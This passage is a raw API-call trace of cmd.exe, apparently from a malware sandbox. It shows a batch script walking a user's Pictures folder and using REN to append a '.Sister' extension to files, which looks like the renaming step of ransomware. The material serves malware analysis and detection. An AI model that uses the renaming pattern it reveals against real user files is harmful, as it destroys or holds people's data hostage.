Flags=0x8, Size=0xc8) returned 0x21ed8d6a960 [0292.713] GetProcessHeap () returned 0x21ed8c70000 [0292.713] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a960, Size=0x6c) returned 0x21ed8d67b30 [0292.713] GetProcessHeap () returned 0x21ed8c70000 [0292.713] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67b30) returned 0x6c [0292.713] malloc (_Size=0xffce) returned 0x21ed97ffb80 [0292.713] ??_V@YAXPEAX@Z () returned 0x21ed97ffb80 [0292.713] GetProcessHeap () returned 0x21ed8c70000 [0292.713] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ce20 [0292.713] GetProcessHeap () returned 0x21ed8c70000 [0292.713] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31c60 [0292.713] _wcsicmp (_String1="Cm2WieoPB7gN.png", _String2=".") returned 53 [0292.713] _wcsicmp (_String1="Cm2WieoPB7gN.png", _String2="..") returned 53 [0292.713] GetFileAttributesW (lpFileName="Cm2WieoPB7gN.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cm2wieopb7gn.png")) returned 0x20 [0292.714] GetProcessHeap () returned 0x21ed8c70000 [0292.714] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cb7560 [0292.715] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cb7570 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.715] SetErrorMode (uMode=0x0) returned 0x0 [0292.715] SetErrorMode (uMode=0x1) returned 0x0 [0292.715] GetFullPathNameW (in: lpFileName="Cm2WieoPB7gN.png", nBufferLength=0x7fe7, lpBuffer=0x21ed97ffb80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Cm2WieoPB7gN.png", lpFilePart=0xa6cf4fd660*="Cm2WieoPB7gN.png") returned 0x29 [0292.715] SetErrorMode (uMode=0x0) returned 0x1 [0292.715] GetProcessHeap () returned 0x21ed8c70000 [0292.715] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d323b0 [0292.716] _wcsicmp (_String1="Cm2WieoPB7gN.png", _String2=".") returned 53 [0292.716] _wcsicmp (_String1="Cm2WieoPB7gN.png", _String2="..") returned 53 [0292.716] GetFileAttributesW (lpFileName="Cm2WieoPB7gN.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cm2wieopb7gn.png")) returned 0x20 [0292.716] ??_V@YAXPEAX@Z () returned 0x1 [0292.716] malloc (_Size=0xffce) returned 0x21ed97ffb80 [0292.716] ??_V@YAXPEAX@Z () returned 0x21ed97ffb80 [0292.716] malloc (_Size=0xffce) returned 0x21ed980fb60 [0292.716] ??_V@YAXPEAX@Z () returned 0x21ed980fb60 [0292.716] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Cm2WieoPB7gN.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cm2wieopb7gn.png")) returned 0x20 [0292.716] malloc (_Size=0xffce) returned 0x21ed981fb40 [0292.716] ??_V@YAXPEAX@Z () returned 0x21ed981fb40 [0292.716] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Cm2WieoPB7gN.png", fInfoLevelId=0x1, lpFindFileData=0x21ed8d31c70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d31c70) returned 0x21ed8c7cdc0 [0292.717] malloc (_Size=0xffce) returned 0x21ed982fb20 [0292.717] ??_V@YAXPEAX@Z () returned 0x21ed982fb20 [0292.718] ??_V@YAXPEAX@Z () returned 0x1 [0292.718] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Cm2WieoPB7gN.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cm2wieopb7gn.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Cm2WieoPB7gN.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\cm2wieopb7gn.png.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0292.719] FindNextFileW (in: hFindFile=0x21ed8c7cdc0, lpFindFileData=0x21ed8d31c70 | out: lpFindFileData=0x21ed8d31c70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c00470, ftCreationTime.dwHighDateTime=0x1d5e3de, ftLastAccessTime.dwLowDateTime=0x7d12ada0, ftLastAccessTime.dwHighDateTime=0x1d5e8ad, ftLastWriteTime.dwLowDateTime=0x7d12ada0, ftLastWriteTime.dwHighDateTime=0x1d5e8ad, nFileSizeHigh=0x0, nFileSizeLow=0xe23a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cm2WieoPB7gN.png", cAlternateFileName="")) returned 0 [0292.722] GetLastError () returned 0x12 [0292.722] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0292.722] ??_V@YAXPEAX@Z () returned 0x1 [0292.722] ??_V@YAXPEAX@Z () returned 0x1 [0292.722] ??_V@YAXPEAX@Z () returned 0x1 [0292.722] ??_V@YAXPEAX@Z () returned 0x1 [0292.722] GetProcessHeap () returned 0x21ed8c70000 [0292.722] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cfa0 [0292.722] GetProcessHeap () returned 0x21ed8c70000 [0292.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95680, Size=0x16) returned 0x21ed8c95b80 [0292.722] GetProcessHeap () returned 0x21ed8c70000 [0292.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95b80) returned 0x16 [0292.722] GetProcessHeap () returned 0x21ed8c70000 [0292.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45cb0, Size=0x20) returned 0x21ed8d45b30 [0292.722] GetProcessHeap () returned 0x21ed8c70000 [0292.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45b30) returned 0x20 [0292.722] GetProcessHeap () returned 0x21ed8c70000 [0292.722] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bf00 [0292.722] GetProcessHeap () returned 0x21ed8c70000 [0292.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bf00, Size=0xb2) returned 0x21ed8c967c0 [0292.722] GetProcessHeap () returned 0x21ed8c70000 [0292.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c967c0) returned 0xb2 [0292.723] GetProcessHeap () returned 0x21ed8c70000 [0292.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cc96e0 [0292.723] GetProcessHeap () returned 0x21ed8c70000 [0292.723] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc96e0, Size=0x30) returned 0x21ed8cc96e0 [0292.723] GetProcessHeap () returned 0x21ed8c70000 [0292.723] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc96e0) returned 0x30 [0292.723] GetProcessHeap () returned 0x21ed8c70000 [0292.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cc9720 [0292.723] malloc (_Size=0x1ff9c) returned 0x21ed97ffb80 [0292.723] GetProcessHeap () returned 0x21ed8c70000 [0292.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96ac0 [0292.723] GetProcessHeap () returned 0x21ed8c70000 [0292.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96dc0 [0292.723] ??_V@YAXPEAX@Z () returned 0x1 [0292.723] malloc (_Size=0x1ff9c) returned 0x21ed97ffb80 [0292.723] GetProcessHeap () returned 0x21ed8c70000 [0292.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c95f80 [0292.723] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed97ffb80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0292.723] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0292.724] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.724] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0292.724] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0292.724] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0292.724] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.725] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0292.725] malloc (_Size=0x1ff9c) returned 0x21ed981fb30 [0292.725] ??_V@YAXPEAX@Z () returned 0x21ed981fb30 [0292.725] GetProcessHeap () returned 0x21ed8c70000 [0292.725] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67830 [0292.725] ??_V@YAXPEAX@Z () returned 0x1 [0292.725] ??_V@YAXPEAX@Z () returned 0x1 [0292.725] GetProcessHeap () returned 0x21ed8c70000 [0292.725] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9720, Size=0x490) returned 0x21ed8cc9720 [0292.725] GetProcessHeap () returned 0x21ed8c70000 [0292.725] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9720) returned 0x490 [0292.725] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0292.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.725] GetFileType (hFile=0x50) returned 0x2 [0292.725] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.726] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0292.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.726] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0292.734] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.734] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.734] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0292.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.734] GetFileType (hFile=0x50) returned 0x2 [0292.734] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.734] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0292.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.735] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0292.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.735] GetFileType (hFile=0x50) returned 0x2 [0292.735] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.735] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0292.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.736] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cc96f0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8cc96f0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0292.736] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0292.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.736] GetFileType (hFile=0x50) returned 0x2 [0292.736] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.737] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0292.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.737] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0292.743] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0292.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.743] GetFileType (hFile=0x50) returned 0x2 [0292.743] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.743] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0292.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.743] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0292.749] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.750] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.750] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.750] malloc (_Size=0xffce) returned 0x21ed97ffb80 [0292.750] ??_V@YAXPEAX@Z () returned 0x21ed97ffb80 [0292.750] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0292.750] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0292.750] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0292.750] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0292.750] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0292.750] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0292.750] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0292.750] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0292.750] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0292.750] ??_V@YAXPEAX@Z () returned 0x1 [0292.750] GetProcessHeap () returned 0x21ed8c70000 [0292.750] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0292.750] GetProcessHeap () returned 0x21ed8c70000 [0292.750] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed8d62bd0 [0292.751] GetProcessHeap () returned 0x21ed8c70000 [0292.751] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62bd0) returned 0x130 [0292.751] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.751] malloc (_Size=0xffce) returned 0x21ed97ffb80 [0292.751] ??_V@YAXPEAX@Z () returned 0x21ed97ffb80 [0292.751] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.751] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed97ffb80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0292.753] ??_V@YAXPEAX@Z () returned 0x1 [0292.753] GetProcessHeap () returned 0x21ed8c70000 [0292.753] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62d10 [0292.753] GetProcessHeap () returned 0x21ed8c70000 [0292.753] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e420 [0292.753] GetProcessHeap () returned 0x21ed8c70000 [0292.753] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e420, Size=0x130) returned 0x21ed8d62950 [0292.753] GetProcessHeap () returned 0x21ed8c70000 [0292.753] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62950) returned 0x130 [0292.753] malloc (_Size=0xffce) returned 0x21ed97ffb80 [0292.753] ??_V@YAXPEAX@Z () returned 0x21ed97ffb80 [0292.753] GetProcessHeap () returned 0x21ed8c70000 [0292.753] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cc40 [0292.754] GetProcessHeap () returned 0x21ed8c70000 [0292.754] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d308e0 [0292.754] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0292.754] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0292.754] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.754] GetLastError () returned 0x2 [0292.754] GetProcessHeap () returned 0x21ed8c70000 [0292.754] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cc9bc0 [0292.754] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cc9bd0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.754] SetErrorMode (uMode=0x0) returned 0x0 [0292.754] SetErrorMode (uMode=0x1) returned 0x0 [0292.754] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed97ffb80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0292.754] SetErrorMode (uMode=0x0) returned 0x1 [0292.754] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0292.754] GetProcessHeap () returned 0x21ed8c70000 [0292.754] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31030 [0292.755] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0292.755] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0292.755] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.755] GetLastError () returned 0x2 [0292.755] ??_V@YAXPEAX@Z () returned 0x1 [0292.755] malloc (_Size=0xffce) returned 0x21ed97ffb80 [0292.755] ??_V@YAXPEAX@Z () returned 0x21ed97ffb80 [0292.755] malloc (_Size=0xffce) returned 0x21ed980fb60 [0292.755] ??_V@YAXPEAX@Z () returned 0x21ed980fb60 [0292.755] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.755] GetLastError () returned 0x2 [0292.755] _get_osfhandle (_FileHandle=2) returned 0x54 [0292.755] GetFileType (hFile=0x54) returned 0x2 [0292.755] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0292.755] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0292.756] _get_osfhandle (_FileHandle=2) returned 0x54 [0292.756] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0292.756] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0292.756] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0292.756] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0292.762] longjmp () [0292.762] ??_V@YAXPEAX@Z () returned 0x1 [0292.762] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0264410, ftCreationTime.dwHighDateTime=0x1d5ec5b, ftLastAccessTime.dwLowDateTime=0xd7d8d080, ftLastAccessTime.dwHighDateTime=0x1d5ed43, ftLastWriteTime.dwLowDateTime=0xd7d8d080, ftLastWriteTime.dwHighDateTime=0x1d5ed43, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="DCw650z.bmp", cAlternateFileName="")) returned 1 [0292.762] GetProcessHeap () returned 0x21ed8c70000 [0292.762] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379c90, Size=0x98) returned 0x21ed8d66290 [0292.762] GetProcessHeap () returned 0x21ed8c70000 [0292.762] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66290) returned 0x98 [0292.762] GetProcessHeap () returned 0x21ed8c70000 [0292.762] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cd9bb0 [0292.762] GetProcessHeap () returned 0x21ed8c70000 [0292.762] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cd9bb0, Size=0x30) returned 0x21ed8cd9bb0 [0292.762] GetProcessHeap () returned 0x21ed8c70000 [0292.762] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cd9bb0) returned 0x30 [0292.762] GetProcessHeap () returned 0x21ed8c70000 [0292.763] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cd9bf0 [0292.763] malloc (_Size=0x1ff9c) returned 0x21ed981fb40 [0292.763] GetProcessHeap () returned 0x21ed8c70000 [0292.763] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45ce0 [0292.763] ??_V@YAXPEAX@Z () returned 0x1 [0292.763] GetProcessHeap () returned 0x21ed8c70000 [0292.763] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cd9bf0, Size=0x130) returned 0x21ed8cd9bf0 [0292.763] GetProcessHeap () returned 0x21ed8c70000 [0292.763] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cd9bf0) returned 0x130 [0292.763] GetProcessHeap () returned 0x21ed8c70000 [0292.763] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cd9d30 [0292.763] GetProcessHeap () returned 0x21ed8c70000 [0292.764] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cd9d30, Size=0x290) returned 0x21ed8cd9d30 [0292.764] GetProcessHeap () returned 0x21ed8c70000 [0292.764] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cd9d30) returned 0x290 [0292.764] GetProcessHeap () returned 0x21ed8c70000 